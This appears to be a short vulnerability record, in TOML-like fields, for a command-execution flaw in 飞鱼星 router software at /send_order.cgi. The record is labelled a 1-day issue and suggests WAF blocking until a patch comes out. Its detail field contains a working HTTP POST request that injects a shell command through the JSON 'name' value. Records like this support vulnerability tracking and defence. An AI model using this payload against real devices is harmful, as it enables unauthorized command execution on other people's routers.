vendor = "飞鱼星"
name = "飞鱼星 命令执行漏洞"
type = "RCE"
version = "未知"
path = "/send_order.cgi"
detail = "POST /send_order.cgi?parameter=operation HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Content-Type: application/x-www-form-urlencoded {\"opid\":\"777777777777777777\",\"name\":\";echo 'test' > 123.txt;echo\",\"type\":\"rest\"}"
fix = "WAF封禁路路径，等待发布补丁"
date = "0807"
label = "1day"
